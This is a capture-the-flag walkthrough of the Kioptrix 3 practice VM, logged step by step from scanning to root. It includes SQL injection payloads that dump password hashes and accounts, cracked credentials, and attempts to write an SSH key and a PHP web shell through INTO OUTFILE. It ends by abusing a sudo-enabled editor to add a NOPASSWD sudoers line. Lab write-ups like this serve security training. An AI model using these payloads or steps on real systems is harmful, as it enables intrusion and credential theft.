Intro

The object of the game is to acquire root access via any means possible (except actually hacking the VM server or player).

The purpose of these games are to learn the basic tools and techniques in vulnerability assessment and exploitation. There are more ways then one to successfully complete the challenges.

Level 1.2

First, host discovery scan:

# nmap -sP 192.168.0.1/24
...
Host is up (0.000072s latency).
MAC Address: 00:0C:29:88:0D:15 (VMware)

Service identification scan:

# nmap -A -sS -T5 192.168.0.9
Nmap scan report for 192.168.0.9
Host is up (0.00033s latency).
PORT   STATE SERVICE VERSION
22/tcp open  ssh    OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
80/tcp open  http    Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)
|_http-server-header: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.33

So it runs SSH, and a web server, smaller attack surface than the previous machines. We connect to the web server using the browser and we see it runs a CMS called LotusCMS.

I run Nikto and Dirb against it and find a phpMyAdmin interface at *http://192.168.0.9/phpmyadmin/*I look for known exploits for PhpMyAdmin 2.11.3, Suhosin-Patch, Php 5.5.25, Apache 2.4.12, but do not find anything useful.

I play a bit with the web interface and there are a couple of interesting parameter the first URL is

http://192.168.0.9/index.php?page=index

I see how the server responds to different invalid input, specifically I try inputs like *./index* and *./././index* to see if the server is canonicalizing the path. Nothing interesting is found. The next interesting URL is:

http://192.168.0.9/index.php?system=Admin

I issue the same request with *./Admin* and get the following response:

Parse error: syntax error, unexpected '.', expecting T_STRING or T_VARIABLE or '$' in /home/www/kioptrix3.com/core/lib/router.php(26) : eval()'d code on line 1

Wow, looks like the input hits the PHP function eval. I try multiple inputs such as:

http://192.168.0.9/index.php?system=system("cat /etc/passwd");

But I don't manage to get anything useful through. I go to the main vendor site http://www.lotuscms.org/ and find that their site has the same issue, which means it is probably not the solution to the challenge. There is a remote code execution exploit available at:

https://packetstormsecurity.com/files/122161/LotusCMS-3.0-PHP-Code-Execution.html

But it does not work. I start testing all the parameter of the app against input validation issues until I find the following:

GET /gallery/gallery.php?id=1' HTTP/1.1

HTTP/1.1 200 OK
....
    You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' order by parentid,sort,name' at line 1Could not select category

Looks like we found SQL injection, to confirm it is a error based in numeric context within the where clause we can send:

?id=1+or+1=1
?id=1+or+1=2

We see we get difference responses caused by a True vs False where clause. To exploit this, we want to use the union operator to make a subquery and leak sensitive data. First, we find the number of columns by sending the following payloads:

?id=1+union+select+1
?id=1+union+select+1,1
?id=1+union+select+1,1,1
...

We send the previous payload until the error message vanishes. The first error told us the backend runs MySql, I check my cheat sheet of SQL injection at http://guif.re/sqli and try to leak the hashes of the users' passwords in the table mysql.user. The payload looks like:

GET /gallery/gallery.php?id=1+UNION+SELECT+host,+user,+password,+1,+1,+1+FROM+mysql.user%23 HTTP/1.1

HTTP/1.1 200 OK
...
<a href="g.php/0" class="gallery">root</a><div class="desc">*47FB3B1E573D80F44CD198DC65DE7764795F948E</div><strong>Sub Galleries:</strong><table width="100%" cellspacing="0" cellpadding="0"> <tr>  <td class="subs">

So we found the hash 47FB3B1E573D80F44CD198DC65DE7764795F948E. We can use an online rainbow table web site to find the plaintext, which is fuckeyou. With the password we can log in at the PhpMyAdmin client locate at http://192.168.0.9/phpmyadmin

I can write arbitrary files using into outfile, I can write my public key into the know_hosts file and SSH into the machine with my private key.

SELECT "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDD88YHrKMKhvcJITrb4nlNueC2XE5MoPaOvT+oul2u72QSZ++4Fp8TFcm33fMgYFUp892Swqj439L2RrsEMfcMz5jpK+BbFCHn4h/4tmVWjhxKA65NQGy6MwdODqpp3iwJUYlkxE33iw5T9X8czYBbk+5zmVpldh2H2jL6YyzGXoAktbiCMGYkrZz2ehblnIZVb+iPgwd2GNpIXKm/kUKznwoGiyEJjg6Aj7Nf45N7h+G9IkLtWNup809hy6eE7GBjJwM32/bWnDCdQkOfEkWRS31f0FQqaXG4k+2MZ/bFL2YKCR/vE1D9VJbxuiCJy3Xx/PF5ae3k4OipAlHsWZzL root@kali"
INTO OUTFILE "/root/.ssh/known_hosts"

MySQL said: Documentation
#1 - Can't create/write to file '/root/.ssh/known_hosts' (Errcode: 13)

It does not work, I can try to upload a PHP backdoor to the web server.

SELECT "<?php system($_GET_['cmd']); ?>"
INTO OUTFILE "/usr/share/phpmyadmin/b.php"

MySQL said: Documentation
#1 - Can't create/write to file '/usr/share/phpmyadmin/b.php' (Errcode: 13)
I try writing to multiple directories without success.
 SELECT "<?php system($_GET_['cmd']); ?>"
INTO OUTFILE "/home/www/kioptrix3.com/core/lib/b.php"

MySQL said: Documentation
#1 - Can't create/write to file '/home/www/kioptrix3.com/core/lib/b.php' (Errcode: 13)

I look for know exploits for PhpMyAdmin 2.11.3 but found nothing useful.

I move on back to the gallery, there was a login page, maybe there is some interesting functionality. I find the password running the query:

SELECT * FROM dev_accounts
1  dreg  0d3eccfb887aabd50f243b3f155c0f85
2  loneferret  5badcaf789d3d1d09794d8f021f40f0e

Which, decrypts to:

0d3eccfb887aabd50f243b3f155c0f85 MD5 : Mast3r
5badcaf789d3d1d09794d8f021f40f0e MD5 : starwars

I can SSH into the box using those credentials. Apache does not run a root, so we can not upload a PHP backdoor and execute commands. I get the system info:

dreg@Kioptrix3:~$ uname -a
Linux Kioptrix3 2.6.24-24-server #1 SMP Tue Jul 7 20:21:17 UTC 2009 i686 GNU/Linux
dreg@Kioptrix3:~$ cat /proc/version
Linux version 2.6.24-24-server (buildd@palmer) (gcc version 4.2.4 (Ubuntu 4.2.4-1ubuntu4)) #1 SMP Tue Jul 7 20:21:17 UTC 2009

I try many local privilege escalation exploits and none of them work. I log in with the other user, loneferret and find the following in the home directory.

loneferret@Kioptrix3:~$ ls -ltra
total 64
-rwxrwxr-x 1 root       root       26275 2011-01-12 10:45 checksec.sh
-rw-r--r-- 1 loneferret loneferret   586 2011-04-11 17:00 .profile
-rw-r--r-- 1 loneferret loneferret  2940 2011-04-11 17:00 .bashrc
-rw-r--r-- 1 loneferret loneferret   220 2011-04-11 17:00 .bash_logout
-rw-r--r-- 1 loneferret loneferret     0 2011-04-11 18:00 .sudo_as_admin_successful
drwx------ 2 loneferret loneferret  4096 2011-04-14 11:05 .ssh
-rw------- 1 root       root          15 2011-04-15 21:21 .nano_history
drwxr-xr-x 5 root       root        4096 2011-04-16 07:54 ..
-rw-r--r-- 1 root       root         224 2011-04-16 08:51 CompanyPolicy.README
drwxr-xr-x 3 loneferret loneferret  4096 2011-04-17 08:59 .
-rw-r--r-- 1 loneferret users        653 2017-09-16 08:30 .bash_history

The CompanyPolicy.README file seems interesting.

loneferret@Kioptrix3:~$ cat CompanyPolicy.README
Hello new employee,
It is company policy here to use our newly installed software for editing, creating and viewing files.
Please use the command 'sudo ht'.
Failure to do so will result in you immediate termination.

Looks like a good hint, after running it:

loneferret@Kioptrix3:~$ sudo ht
Error opening terminal: xterm-256color.
loneferret@Kioptrix3:~$ echo $TERM
xterm-256color

We have the wrong terminal, we just need to export the environment variable TERM to xterm and run the app.

loneferret@Kioptrix3:~$ export TERM=xterm

Once we open the app, we realize it has the SUID bit set and we can open and write arbitrary files as root. At this point it is game over, we can read the */etc/shadow* file and crack the passwords.

│00000000 72 6f 6f 74 3a 24 31 24-51 41 4b 76 56 4a 65 79 |root:$1$QAKvVJey|
│00000010 24 36 72 52 6b 41 4d 47-4b 71 31 75 36 32 79 66 |$6rRkAMGKq1u62yf|
│00000020 44 61 65 6e 55 72 31 3a-31 35 30 38 32 3a 30 3a |DaenUr1:15082:0:|
│00000030 39 39 39 39 39 3a 37 3a-3a 3a 0a 64 61 65 6d 6f |99999:7:::?daemo|

We can also install a cronjob that runs every minute as root and creates a backdoor, etc.. I decide to just add my username to to sudoers group by adding the line

loneferret ALL=(ALL) NOPASSWD:ALL

After that I can just sudo su:

loneferret@Kioptrix3:~$ sudo su
root@Kioptrix3:/home/loneferret# id
uid=0(root) gid=0(root) groups=0(root)